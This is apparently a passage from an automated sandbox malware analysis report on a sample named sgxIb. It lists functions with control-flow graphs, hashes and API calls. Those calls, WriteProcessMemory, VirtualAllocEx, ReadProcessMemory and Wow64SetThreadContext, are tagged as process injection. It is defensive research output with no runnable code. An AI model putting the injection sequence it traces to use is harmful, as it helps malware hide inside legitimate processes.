                                • Opcode ID: a0b1f6083cfa4e65842b43da79de099d3e39a38f1ac144b18ab63aeea9eb59ff
                                • Instruction ID: 5c8e53c6424b86c2e6c9309720feeb93da444f19da07e8dd47743cbefc5b55f6
                                • Opcode Fuzzy Hash: a0b1f6083cfa4e65842b43da79de099d3e39a38f1ac144b18ab63aeea9eb59ff
                                • Instruction Fuzzy Hash: 0441D0B0C00B19CBDB24DFAAC88479EFBB1BF48304F20856AD418AB251DB756946CF50
                                Function 06D90608 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 207 6d90608-6d9065e 210 6d9066e-6d906ad WriteProcessMemory 207->210 211 6d90660-6d9066c 207->211 213 6d906af-6d906b5 210->213 214 6d906b6-6d906e6 210->214 211->210 213->214
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D906A0
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fe9e19f483c9401f3894ef1ffbee9065aecdc4b25ebcc5253d3df5541b9e05d3
                                • Instruction ID: 7e9d1fc4809df7923e26ff0f1ecee6cd13f6b77910cd4b9dc60dc478b38416ef
                                • Opcode Fuzzy Hash: fe9e19f483c9401f3894ef1ffbee9065aecdc4b25ebcc5253d3df5541b9e05d3
                                • Instruction Fuzzy Hash: 14213571D003099FDB10DFAAD885BDEBBF5FF88310F10842AE959A7241C7789944CBA1
                                Function 06D90610 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 218 6d90610-6d9065e 220 6d9066e-6d906ad WriteProcessMemory 218->220 221 6d90660-6d9066c 218->221 223 6d906af-6d906b5 220->223 224 6d906b6-6d906e6 220->224 221->220 223->224
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D906A0
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: ddffaab3696e75349d4200a0fb309307a46b2aa4017e59da5f711d4b0c750268
                                • Instruction ID: bff8cf1bd53d9783bda30218075088a2e3cfbdcae8ead24d0ee86bd5e7f595e5
                                • Opcode Fuzzy Hash: ddffaab3696e75349d4200a0fb309307a46b2aa4017e59da5f711d4b0c750268
                                • Instruction Fuzzy Hash: C92113B1D003099FDB10DFAAC885BDEBBF5FF88310F10842AE959A7240C7789944CBA0
                                Function 06D906F9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 244 6d906f9-6d9078d ReadProcessMemory 247 6d9078f-6d90795 244->247 248 6d90796-6d907c6 244->248 247->248
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D90780
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 4c9cc81dfb312ff97695063ee25848832de69e62373f557fb353e98027c869e3
                                • Instruction ID: 0b7cd73e73fe172c67e24081292e2317ac2d6cc8218158ac211d7c19f3a50a10
                                • Opcode Fuzzy Hash: 4c9cc81dfb312ff97695063ee25848832de69e62373f557fb353e98027c869e3
                                • Instruction Fuzzy Hash: 77212571C003599FDB10CFAAD884BEEBBF1BF48310F10852EE559A7240C7799905CBA0
                                Function 06D90470 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 234 6d90470-6d904c3 236 6d904d3-6d90503 Wow64SetThreadContext 234->236 237 6d904c5-6d904d1 234->237 239 6d9050c-6d9053c 236->239 240 6d90505-6d9050b 236->240 237->236 240->239
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D904F6
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: f76ce315975d18a63f6f0c54bb965847722e36ad2d813077edd1293653398d84
                                • Instruction ID: ced5832208775ad6091318adf8b18d4b8777a92ade4a8d8d36f2360282972cba
                                • Opcode Fuzzy Hash: f76ce315975d18a63f6f0c54bb965847722e36ad2d813077edd1293653398d84
                                • Instruction Fuzzy Hash: DD216871D003098FDB50DFAAC484BEEBBF4AF88314F54842ED559A7241C778AA45CFA0
                                Function 00C3B750 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 228 c3b750-c3d794 DuplicateHandle 230 c3d796-c3d79c 228->230 231 c3d79d-c3d7ba 228->231 230->231
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C3D6C6,?,?,?,?,?), ref: 00C3D787
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 304492e27a00116c7529fe17a5d0d0729fc6554d5024ed1834f68c3bec87cce3
                                • Instruction ID: 1a02e8876f4c1cbf9ca50e9c7405acac3fab351dbafaa75f4417c4ba25e712ec
                                • Opcode Fuzzy Hash: 304492e27a00116c7529fe17a5d0d0729fc6554d5024ed1834f68c3bec87cce3
                                • Instruction Fuzzy Hash: 8721E3B5900349EFDB10CF9AD884ADEBBF4EB48310F14846AE919A7350D374A950CFA5
                                Function 00C3D6F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 252 c3d6f9-c3d794 DuplicateHandle 253 c3d796-c3d79c 252->253 254 c3d79d-c3d7ba 252->254 253->254
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C3D6C6,?,?,?,?,?), ref: 00C3D787
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: afa2bf6a8e79c67e4aefd5dfb53ddad40b26479c88e0edf31a31e628328c20c7
                                • Instruction ID: f2f3804090a46f50cbbfa1d0d278e5c86bbf07be5229f1b6406a1186d0045fac
                                • Opcode Fuzzy Hash: afa2bf6a8e79c67e4aefd5dfb53ddad40b26479c88e0edf31a31e628328c20c7
                                • Instruction Fuzzy Hash: 8F21E4B5D00209EFDB10CF9AD484ADEBBF4EB48310F14845AE919A7350D374A951CFA1
                                Function 06D90700 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 267 6d90700-6d9078d ReadProcessMemory 270 6d9078f-6d90795 267->270 271 6d90796-6d907c6 267->271 270->271
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D90780
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0fdbb8accc8e2979520ffd1ceffcaaab2daf3236531fe9a25e50bd08fae8e5a2
                                • Instruction ID: 897f68472d46aa95fb97237a44a31e265d2560caf11fce268748b2a379694eed
                                • Opcode Fuzzy Hash: 0fdbb8accc8e2979520ffd1ceffcaaab2daf3236531fe9a25e50bd08fae8e5a2
                                • Instruction Fuzzy Hash: 98212871C003499FDB10DFAAC884BDEBBF5FF48310F50842AE519A7240C7789940CBA1
                                Function 06D90478 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 257 6d90478-6d904c3 259 6d904d3-6d90503 Wow64SetThreadContext 257->259 260 6d904c5-6d904d1 257->260 262 6d9050c-6d9053c 259->262 263 6d90505-6d9050b 259->263 260->259 263->262
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D904F6
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 9db944a9bda601fca82f5767f8e24a030c75953a04f3e28b42a313e009189f9b
                                • Instruction ID: 63b064e1230a79a8178bff77baf11bba4fab530211a42100f7b0d36a1eef0bda
                                • Opcode Fuzzy Hash: 9db944a9bda601fca82f5767f8e24a030c75953a04f3e28b42a313e009189f9b
                                • Instruction Fuzzy Hash: 26213471D003098FDB50DFAAC485BEEBBF4AF49210F54842ED519A7240C778AA44CFA1
                                Function 06D90548 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 275 6d90548-6d905cb VirtualAllocEx 278 6d905cd-6d905d3 275->278 279 6d905d4-6d905f9 275->279 278->279
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D905BE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 31d14ec126620ee24a0ab904c2fbdcc6ffd7ebf7ce9fef13cec99fd3c370df05
                                • Instruction ID: aff66fd92c5a5b417e12c487338e801a411c39a180e41c2ba3848976d79fd8b4
                                • Opcode Fuzzy Hash: 31d14ec126620ee24a0ab904c2fbdcc6ffd7ebf7ce9fef13cec99fd3c370df05
                                • Instruction Fuzzy Hash: 28115672C002499FDF10DFAAD845BEEBBF5EF48320F14881AE919A7250C7769940CFA1
                                Function 06D90550 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 283 6d90550-6d905cb VirtualAllocEx 286 6d905cd-6d905d3 283->286 287 6d905d4-6d905f9 283->287 286->287
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D905BE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 111088b395539625ee3dc848c982e21e0f6e6e60adfe0f97f7d6e2bef275e377
                                • Instruction ID: 601f9ce68252ab043a730736e72fad97e9d63a447aba99aba53f308a0d2edc74
                                • Opcode Fuzzy Hash: 111088b395539625ee3dc848c982e21e0f6e6e60adfe0f97f7d6e2bef275e377
                                • Instruction Fuzzy Hash: 5E1126728003499FDB10DFAAD844BEEBBF5EF48310F14881AE515A7250C7759940CFA1
                                Function 06D942F0 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D94355
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 35f3c08155291158b075d4d8356508d9f4d22bacf8a2514d5481b6c293de3b0f
                                • Instruction ID: 52fb790ccb56c292e685ffb7d3f3b8f1582741d6c1b67d5c660fc0dcaf1a1f09
                                • Opcode Fuzzy Hash: 35f3c08155291158b075d4d8356508d9f4d22bacf8a2514d5481b6c293de3b0f
                                • Instruction Fuzzy Hash: F611F5B58007499FDB20DF9AC845BDEBBF8EB48310F108819E518A7700C375A544CFA1
                                Function 00C3A48C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00C3B124), ref: 00C3B35E
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e47212a12be5d932a33a8df19144a61affed3116f1c2dc3f91b15016a559e506
                                • Instruction ID: 780a337d0d1435e2d2b726f21aeacad8f25e72da9bc0eafc3ac20c7ef0f92248
                                • Opcode Fuzzy Hash: e47212a12be5d932a33a8df19144a61affed3116f1c2dc3f91b15016a559e506
                                • Instruction Fuzzy Hash: E51120B5C006098BDB10CF9AC444BDEFBF4EB88320F10846AD929A7210D3B5A905CFA1
                                Function 06D909A0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D94355
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: cdb82b843fad3f5e5cd23cfb5770d0221ea590e7bb57331304cf347ddfbbeea1
                                • Instruction ID: 89680799354a471cf33255f92d6ec3ed8daca3821407ae622541be446a95c0d4
                                • Opcode Fuzzy Hash: cdb82b843fad3f5e5cd23cfb5770d0221ea590e7bb57331304cf347ddfbbeea1
                                • Instruction Fuzzy Hash: BF11F2B5800749DFDB10DF9AC889BDEFBF8EB48320F10845AE568A7601D375A944CFA5
                                Function 00B4D4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638624120.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b4d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1945e0df3a0224abb83a9faaf83c7c7a2d26f5edc8081bdd0d5a05890ce7170
                                • Instruction ID: 6d2d94deee3fed4107d3b3b21fdb1c5753105c21241a168f1c99b838e2a8d8e9
                                • Opcode Fuzzy Hash: a1945e0df3a0224abb83a9faaf83c7c7a2d26f5edc8081bdd0d5a05890ce7170
                                • Instruction Fuzzy Hash: 14213771600340DFDB05DF14D9C0F2ABFA5FB98318F24C5A9E8090B256C736DA56EBA2
                                Function 00B5D1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638749938.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b5d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e3345b65eb80ae0fb4ab7ce8fc41c5cc8ee2794966f49d8cb89fd6001da0719
                                • Instruction ID: 9123efe488e056bf276202c02f48311c1a0eb7d6505a967f6de37ff0c8d22361
                                • Opcode Fuzzy Hash: 1e3345b65eb80ae0fb4ab7ce8fc41c5cc8ee2794966f49d8cb89fd6001da0719
                                • Instruction Fuzzy Hash: CC21B071604344AFDB25DF50D9C0B26BBA5FB88315F24C6EDEC094B292C777D84ACA62
                                Function 00B5D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638749938.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b5d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 10ff30d8f94d1f4f61eb424ba238ba4730919d9c2f1a7ea7e47f1c6cc50459fc
                                • Instruction ID: 5fdb2e4888b780090368ffb45f976a28689c75ada398ec82121026a2694ca2a1
                                • Opcode Fuzzy Hash: 10ff30d8f94d1f4f61eb424ba238ba4730919d9c2f1a7ea7e47f1c6cc50459fc
                                • Instruction Fuzzy Hash: C821D371504344DFDB24DF10D5D0B16BBA5EB84315F28C6E9DC0A4B2D6C336D84BCA62
                                Function 00B5D005 Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638749938.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b5d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13b21000a4d3f23b459b0f669ab68f6507421b78529a3a34f8a80750baacaed4
                                • Instruction ID: 179bdee2dbaa8562e5ea1f6eb777853fbc65e32f7f5415138050207145c720dc
                                • Opcode Fuzzy Hash: 13b21000a4d3f23b459b0f669ab68f6507421b78529a3a34f8a80750baacaed4
                                • Instruction Fuzzy Hash: 222187755093C08FDB16CF20D5D4715BF71EB45314F28C6DAD8498B697C33A984ACB62
                                Function 00B4D4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638624120.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b4d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction ID: cba24f7d6d3c4213d2ad78b1222f65d6c935c0d7ab58f638e4556f0ac37fe197
                                • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction Fuzzy Hash: 8E11E172504280CFCB01CF10D5C0B16BFB1FB94318F24C6EAD8490B656C336D956DBA1
                                Function 00B5D1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638749938.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b5d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 75c1e54c3d0bc8992cee4f9672056d0550876ca39ec1db8b086f811dedf55bbe
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: 73117975504280DFCB15CF50D5C4B15BBA1FB84314F28C6EADC494B696C37AD84ACB61
                                Function 00B4D731 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638624120.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b4d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 58732a916a2f97fb1298fdd8de0c61a4698c96ad3a762d1fae502c6b2cba69e4
                                • Instruction ID: 09b8bfeea82766dcbaf92b3b40d8a7e04f727970c538ab1f7dce7cff0cedfb7c
                                • Opcode Fuzzy Hash: 58732a916a2f97fb1298fdd8de0c61a4698c96ad3a762d1fae502c6b2cba69e4
                                • Instruction Fuzzy Hash: 2401D631504744ABFB108B25CDC4B66FBD8DF81365F28C49AFD095B282D6799D40EAB2
                                Function 00B4D730 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000015.00000002.1638624120.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_b4d000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 741f770faff449636d1383aa4c2b25e3af003f2f3dca5a95a0cb57fe729bc64a
                                • Instruction ID: 6689fb50b6e3517b3a4bc82589f3d409b5952ae9b0eb77b9012a0b012001bfe7
                                • Opcode Fuzzy Hash: 741f770faff449636d1383aa4c2b25e3af003f2f3dca5a95a0cb57fe729bc64a
                                • Instruction Fuzzy Hash: 72F0CD32404344AFEB108A16C9C4B62FFE8EB80334F18C49AED081B282C2799C40DAB1

                                Execution Graph

                                Execution Coverage:11.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:4
                                execution_graph 26612 1510848 26613 151084e 26612->26613 26614 151091b 26613->26614 26616 1511340 26613->26616 26618 1511341 26616->26618 26617 1511454 26617->26613 26618->26617 26620 15180f9 26618->26620 26621 1518103 26620->26621 26624 15181b9 26621->26624 26625 6ccfa88 26621->26625 26629 6ccfa78 26621->26629 26624->26618 26626 6ccfa89 26625->26626 26627 6ccfcae 26626->26627 26628 6ccfcd7 GlobalMemoryStatusEx GlobalMemoryStatusEx 26626->26628 26627->26624 26628->26626 26630 6ccfa88 26629->26630 26631 6ccfcae 26630->26631 26632 6ccfcd7 GlobalMemoryStatusEx GlobalMemoryStatusEx 26630->26632 26631->26624 26632->26630

                                Executed Functions

                                Function 06CC6708 Relevance: .8, Instructions: 822COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 417d6089ffafe5269e2b40492c42596d8964aa2c190cebfd697495188ec658a6
                                • Instruction ID: 13b75517e05ed1fdb6739934b7d742b5c7aa54588375e0feb18bff3b7e045475
                                • Opcode Fuzzy Hash: 417d6089ffafe5269e2b40492c42596d8964aa2c190cebfd697495188ec658a6
                                • Instruction Fuzzy Hash: DE628B34A002049FDB54DB69D694AADB7F2FF88360F24856DD806EB350DB35EE42CB90
                                Function 06CC3580 Relevance: .5, Instructions: 545COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1786 6cc3580-6cc35a1 1787 6cc35a3-6cc35a6 1786->1787 1788 6cc35ac-6cc35cb 1787->1788 1789 6cc3d47-6cc3d4a 1787->1789 1799 6cc35cd-6cc35d0 1788->1799 1800 6cc35e4-6cc35ee 1788->1800 1790 6cc3d4c-6cc3d6b 1789->1790 1791 6cc3d70-6cc3d72 1789->1791 1790->1791 1792 6cc3d79-6cc3d7c 1791->1792 1793 6cc3d74 1791->1793 1792->1787 1796 6cc3d82-6cc3d8b 1792->1796 1793->1792 1799->1800 1801 6cc35d2-6cc35e2 1799->1801 1804 6cc35f4-6cc3603 1800->1804 1801->1804 1915 6cc3605 call 6cc3d99 1804->1915 1916 6cc3605 call 6cc3da0 1804->1916 1805 6cc360a-6cc360f 1806 6cc361c-6cc38f9 1805->1806 1807 6cc3611-6cc3617 1805->1807 1828 6cc38ff-6cc39ae 1806->1828 1829 6cc3d39-6cc3d46 1806->1829 1807->1796 1838 6cc39d7 1828->1838 1839 6cc39b0-6cc39d5 1828->1839 1841 6cc39e0-6cc39f3 call 6cc316c 1838->1841 1839->1841 1844 6cc39f9-6cc3a1b call 6cc3178 1841->1844 1845 6cc3d20-6cc3d2c 1841->1845 1844->1845 1849 6cc3a21-6cc3a2b 1844->1849 1845->1828 1846 6cc3d32 1845->1846 1846->1829 1849->1845 1850 6cc3a31-6cc3a3c 1849->1850 1850->1845 1851 6cc3a42-6cc3b18 1850->1851 1863 6cc3b1a-6cc3b1c 1851->1863 1864 6cc3b26-6cc3b56 1851->1864 1863->1864 1868 6cc3b58-6cc3b5a 1864->1868 1869 6cc3b64-6cc3b70 1864->1869 1868->1869 1870 6cc3bd0-6cc3bd4 1869->1870 1871 6cc3b72-6cc3b76 1869->1871 1872 6cc3bda-6cc3c16 1870->1872 1873 6cc3d11-6cc3d1a 1870->1873 1871->1870 1874 6cc3b78-6cc3ba2 1871->1874 1886 6cc3c18-6cc3c1a 1872->1886 1887 6cc3c24-6cc3c32 1872->1887 1873->1845 1873->1851 1881 6cc3ba4-6cc3ba6 1874->1881 1882 6cc3bb0-6cc3bcd call 6cc3184 1874->1882 1881->1882 1882->1870 1886->1887 1889 6cc3c49-6cc3c54 1887->1889 1890 6cc3c34-6cc3c3f 1887->1890 1894 6cc3c6c-6cc3c7d 1889->1894 1895 6cc3c56-6cc3c5c 1889->1895 1890->1889 1893 6cc3c41 1890->1893 1893->1889 1899 6cc3c7f-6cc3c85 1894->1899 1900 6cc3c95-6cc3ca1 1894->1900 1896 6cc3c5e 1895->1896 1897 6cc3c60-6cc3c62 1895->1897 1896->1894 1897->1894 1901 6cc3c89-6cc3c8b 1899->1901 1902 6cc3c87 1899->1902 1904 6cc3cb9-6cc3d0a 1900->1904 1905 6cc3ca3-6cc3ca9 1900->1905 1901->1900 1902->1900 1904->1873 1906 6cc3cad-6cc3caf 1905->1906 1907 6cc3cab 1905->1907 1906->1904 1907->1904 1915->1805 1916->1805
                                Memory Dump Source
                                • Source File: 00000018.00000002.3898718490.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_24_2_6cc0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2ba5ad4e5429eb35e0f3dd83b3b7cc63241b18aedef88436eb1c1641afdda95
                                • Instruction ID: 35b6c2b710cef3d2698ae3fd3bab8842ce26e17646b247dabc85c78536e044e1
                                • Opcode Fuzzy Hash: c2ba5ad4e5429eb35e0f3dd83b3b7cc63241b18aedef88436eb1c1641afdda95
                                • Instruction Fuzzy Hash: 25324E31E10759CFDB14EFA9D8906ADB7B1FF89310F50C66AD409AB210EB70AD85CB90
                                Function 06CC59D8 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
